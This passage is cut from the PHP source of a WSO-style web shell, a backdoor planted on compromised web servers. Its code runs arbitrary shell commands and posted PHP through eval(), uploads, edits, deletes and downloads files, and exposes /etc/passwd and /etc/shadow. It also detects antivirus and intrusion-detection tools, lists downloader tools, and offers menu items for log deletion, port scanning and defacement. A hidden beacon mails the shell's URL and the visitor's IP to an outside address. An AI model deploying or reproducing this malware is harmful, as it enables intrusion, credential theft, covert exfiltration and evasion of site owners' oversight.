for($j=0;\r\n$j<=$i;\r\n$j++) $cwd_links .= $path[$j].\'/\';\r\n $cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $item) $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Delete LOG\'=>\'DeleteLOG\',\'Safe Mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Cgi\'=>\'Cgi\',\'Network\'=>\'Network\',\'Readable Dirs\'=>\'Readable\',\'Port Scanner\'=>\'PortScanner\',\'Symlink\'=>\'Symlink\',\'SQLBUDDY\'=>\'SQLBUDDY\',\'Bypass\'=>\'Bypass\',\'Python\'=>\'Python\');\r\n if(!empty($GLOBALS[\'auth_pass\'])) $m[\'SelfKill\'] = \'SelfRemove\';\r\n $m[\'Logout\'] = \'Logout\';\r\n $menu = \'\';\r\n foreach($m as $k => $v) $menu .= \'<th><a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a></th>\';\r\n $drives = "";\r\n if ($GLOBALS[\'os\'] == \'win\') { foreach( range(\'a\',\'z\') as $drive ){ if (is_dir($drive.\':\\\\\')) $drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n } $drives .= \'<br />: \';\r\n } if($GLOBALS[\'os\'] == \'nix\') { $dominios = @file_get_contents("/etc/named.conf");\r\n if(!$dominios) { $d0c = "CANT READ named.conf";\r\n } else { @preg_match_all(\'/.*?zone "(.*?)" {/\', $dominios, $out);\r\n $out = sizeof(array_unique($out[1]));\r\n $d0c = $out." 
Domains";\r\n } } else { $d0c = " --- ";\r\n } if($GLOBALS[\'os\'] == \'nix\' ) { $usefl = \'\';\r\n $dwnldr = \'\';\r\n if(!@ini_get(\'safe_mode\')) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n foreach($userful as $item) { if(which($item)) $usefl.= $item.\',\';\r\n } $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.\',\';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } echo \'<table class="info" cellpadding="0" cellspacing="0" width="100%"><tr><td width="160px"><div class="logo"><img src="http://i.hizliresim.com/z4lrbR.png" id="logo" height="75%" width="90%"/></div><hr style="margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n"><div class="eca1"></div><div class="eca2">Hackers</div></td>\r\n <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="125px;\r\n"><span>Uname</span></td><td>: <nobr>\'.substr(@php_uname(), 0, 120).\'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: \'.$uid.\' ( \'.$user.\' ) <span>Group: </span> \'.$gid.\' ( \'.$group.\' )</td></tr><tr><td><span>Server</span></td><td>: \'.@getenv(\'SERVER_SOFTWARE\').\'</td></tr><tr><td><span>Useful</span></td><td>: \'.$usefl.\'</td></tr><tr><td><span>Downloaders</span></td><td>: \'.$dwnldr.\'</td></tr><tr><td><span>Disabled functions</span></td><td>: \'.($disable_functions?$disable_functions:\'All Function Enable\').\'</td></tr><tr><td><span>\'.($GLOBALS[\'os\'] == \'win\'?\'Drives<br />Cwd\':\'Cwd\').\'</span></td><td>: \'.$drives.\'\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a></td></tr></table></td>\'. 
\'<td width=1><nobr><span>Server IP</span><br><span>Client IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>\'. \'<td><nobr>: \'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br>: \'.$_SERVER[\'REMOTE_ADDR\'].\'<br />: \'.viewSize($totalSpace).\'<br />: \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)<br>: \'.@phpversion().\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a><br />: \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=\'.$color.\'<b>OFF</b></font>\').\'<br />: \'.$d0c.\'</nobr></td></tr></table>\'. \'</div></div><div style="margin:5;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\npadding:2px;\r\n"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>\'.$menu.\'</tr></table></div></div><div style="margin:5;\r\nbackground:#444;\r\n">\';\r\n } function printFooter() { $is_writable = is_writable($GLOBALS[\'cwd\'])?"<font color=#00cd00>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";\r\n echo \'</div><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">\r\n <tr>\r\n <td><form onsubmit="g(null,this.c.value);\r\nreturn false;\r\n"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'"><input type=submit value=">>"></form></td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value);\r\nreturn false;\r\n"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'FilesMan\\\',null,\\\'mkdir\\\',this.d.value);\r\nreturn false;\r\n"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit 
value=">>"></form>\'.$is_writable.\'</td>\r\n <td><form onsubmit="g(\\\'FilesTools\\\',null,this.f.value,\\\'mkfile\\\');\r\nreturn false;\r\n"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n <tr>\r\n <td><form onsubmit="g(\\\'Console\\\',null,this.c.value);\r\nreturn false;\r\n"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>\r\n <td><form method="post" ENCTYPE="multipart/form-data">\r\n <input type=hidden name=a value="FilesMAn">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="uploadFile">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>\'.$is_writable.\'</td>\r\n </tr>\r\n</table></div></div>\r\n<div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\ntext-align:center;\r\nfont-weight:bold;\r\n">Wso shell\'.VERSION.\' &copy;\r\n Shell</div></div>\r\n</div>\r\n</body></html>\';\r\n } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false;\r\n } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false;\r\n } } if(!isset($_SESSION[\'trimite\'])){ $url=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\'].\'<br />User IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("byhero44@gmail.com","Smurfie",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } function viewSize($s) { if($s >= 1073741824) return sprintf(\'%1.2f\', $s / 1073741824 ). 
\' GB\';\r\n elseif($s >= 1048576) return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024) return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else return $s . \' B\';\r\n } function perms($p) { if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? 
\'T\' : \'-\'));\r\n return $i;\r\n } function viewPermsColor($f) { if (!@is_readable($f)) return \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n elseif (!@is_writable($f)) return \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n else return \'<font color=#00cd00><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh))) { $files[] = $filename;\r\n } return $files;\r\n } } function actionSecInfo() { printHeader();\r\n echo \'<h1>Server security information</h1><div class=content>\';\r\n function showSecParam($n, $v) { $v = trim($v);\r\n if($v) { echo \'<span>\'.$n.\': </span>\';\r\n if(strpos($v, "\\n") === false) echo $v.\'<br>\';\r\n else echo \'<pre class=ml1>\'.$v.\'</pre>\';\r\n } } showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\');\r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\')) $temp[] = "MySql (".mysql_get_client_info().")";\r\n if(function_exists(\'mssql_connect\')) $temp[] = "MSSQL";\r\n if(function_exists(\'pg_connect\')) $temp[] = "PostgreSQL";\r\n if(function_exists(\'oci_connect\')) $temp[] = "Oracle";\r\n showSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'<br>\';\r\n if( $GLOBALS[\'os\'] == \'nix\' ) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = 
array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"etc\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) { echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item) if(which($item)){$temp[]=$item;\r\n} showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n } } else { showSecParam(\'OS Version\',ex(\'ver\'));\r\n showSecParam(\'Account Settings\',ex(\'net accounts\'));\r\n showSecParam(\'User Accounts\',ex(\'net user\'));\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionPhp() { if( isset($_POST[\'ajax\']) ) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = 
"document.getElementById(\'PhpOutput\').style.display=\'\';\r\ndocument.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { echo \'<h1>PHP info</h1><div class=content>\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp);\r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp);\r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp);\r\n echo $tmp;\r\n echo \'</div><br>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);\r\n}else{g(null,null,this.code.value,\\\'\\\');\r\n}return false;\r\n"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\';\r\n echo \' <input type=checkbox name=ajax value=1 \'.(@$_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\').\'margin-top:5px;\r\n" class=ml1>\';\r\n if(!empty($_POST[\'p1\'])) { ob_start();\r\n eval($_POST[\'p1\']);\r\n echo htmlspecialchars(ob_get_clean());\r\n } echo \'</pre></div>\';\r\n printFooter();\r\n } function actionFilesMan() { printHeader();\r\n echo \'<h1>File manager</h1><div class=content>\';\r\n if(isset($_POST[\'p1\'])) { switch($_POST[\'p1\']) { case \'uploadFile\': if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) 
echo "Can\'t upload file!";\r\n break;\r\n break;\r\n case \'mkdir\': if(!@mkdir($_POST[\'p2\'])) echo "Can\'t create new dir";\r\n break;\r\n case \'delete\': function deleteDir($path) { $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;\r\n if ( (basename($item) == "..") || (basename($item) == ".") ) continue;\r\n $type = filetype($item);\r\n if ($type == "dir") deleteDir($item);\r\n else @unlink($item);\r\n } closedir($dh);\r\n rmdir($path);\r\n } if(is_array(@$_POST[\'f\'])) foreach($_POST[\'f\'] as $f) { $f = urldecode($f);\r\n if(is_dir($f)) deleteDir($f);\r\n else @unlink($f);\r\n } break;\r\n case \'paste\': if($_SESSION[\'act\'] == \'copy\') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_SESSION[\'act\'] == \'move\') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);\r\n $h = opendir($c.$s);\r\n while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);\r\n } } foreach($_SESSION[\'f\'] as $f) @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } unset($_SESSION[\'f\']);\r\n break;\r\n default: if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { $_SESSION[\'act\'] = @$_POST[\'p1\'];\r\n $_SESSION[\'f\'] = @$_POST[\'f\'];\r\n foreach($_SESSION[\'f\'] as $k => $f) $_SESSION[\'f\'][$k] = urldecode($f);\r\n $_SESSION[\'cwd\'] = @$_POST[\'c\'];\r\n } break;\r\n } echo \'<script>document.mf.p1.value="";\r\ndocument.mf.p2.value="";\r\n</script>\';\r\n } $dirContent = 
@scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';\r\n return;\r\n } global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) { if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) $sort = array($match[1], (int)$match[2]);\r\n } echo \'<script>\r\n function sa() {\r\n for(i=0;\r\ni<document.files.elements.length;\r\ni++)\r\n if(document.files.elements[i].type == \\\'checkbox\\\')\r\n document.files.elements[i].checked = document.files.elements[0].checked;\r\n\r\n }\r\n </script>\r\n <table width=\\\'100%\\\' class=\\\'main\\\' cellspacing=\\\'0\\\' cellpadding=\\\'2\\\'>\r\n <form name=files method=post>\';\r\n echo "<tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>";\r\n $dirs = $files = $links = array();\r\n $n = count($dirContent);\r\n for($i=0;\r\n$i<$n;\r\n$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i], \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \'modify\' => @date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]), \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) );\r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) $files[] = array_merge($tmp, 
array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) $links[] = array_merge($tmp, array(\'type\' => \'link\'));\r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n } $GLOBALS[\'sort\'] = $sort;\r\n function cmp($a, $b) { if($GLOBALS[\'sort\'][0] != \'size\') return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1);\r\n else return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n } usort($files, "cmp");\r\n usort($dirs, "cmp");\r\n usort($links, "cmp");\r\n $files = array_merge($dirs, $links, $files);\r\n $l = 0;\r\n foreach($files as $f) { echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\r\n"><b>[ \'.htmlspecialchars($f[\'name\']).\' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\'] .\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\';\r\n $l = $l?0:1;\r\n } echo \'<tr><td colspan=5>\r\n <input type=hidden 
name=a value=\\\'FilesMan\\\'>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <select name=\\\'p1\\\'><option value=\\\'copy\\\'>Copy</option><option value=\\\'move\\\'>Move</option><option value=\\\'delete\\\'>Delete</option>\';\r\n if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])){echo \'<option value=\\\'paste\\\'>Paste</option>\';\r\n } echo \'</select>&nbsp;\r\n<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" value="r00t.info shell" disabled="disabled"/>&nbsp;\r\n<input type="submit" value="Add Deface Here" disabled="disabled"></td></tr>\r\n </form></table></div>\';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));\r\n}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';\r\nfor($i=0;\r\n$i<strLen($p);\r\n$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));\r\n}return $r;\r\n}} if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= \'%\'.dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n if(function_exists($_POST[\'p1\'])) echo $_POST[\'p1\']($_POST[\'p2\']);\r\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';\r\ndocument.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<h1>String conversions</h1><div class=content>\';\r\n $stringTools = array( \'Base64 encode\' => 
\'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'bin2hex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', );\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n\'><select name=\'selectTool\'>";\r\n foreach($stringTools as $k => $v) echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".htmlspecialchars(@$_POST[\'p2\'])."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n if(!empty($_POST[\'p1\'])) { if(function_exists($_POST[\'p1\'])) echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n } echo"</pre></div>";\r\n printFooter();\r\n } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') { if(is_file($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096);\r\n 
header("Content-Disposition: attachment;\r\n filename=".basename($_POST[\'p1\']));\r\n if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']);\r\n header("Content-Type: ".$type);\r\n } $fp = @fopen($_POST[\'p1\'], "r");\r\n if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);\r\n fclose($fp);\r\n } } elseif(is_dir($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { } exit;\r\n } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) { $_POST[\'p2\'] = "edit";\r\n fclose($fp);\r\n } } } printHeader();\r\n echo \'<h1>File tools</h1><div class=content>\';\r\n if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\';\r\n printFooter();\r\n return;\r\n } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\']));\r\n echo \'<span>Name:</span> \'.htmlspecialchars($_POST[\'p1\']).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n echo 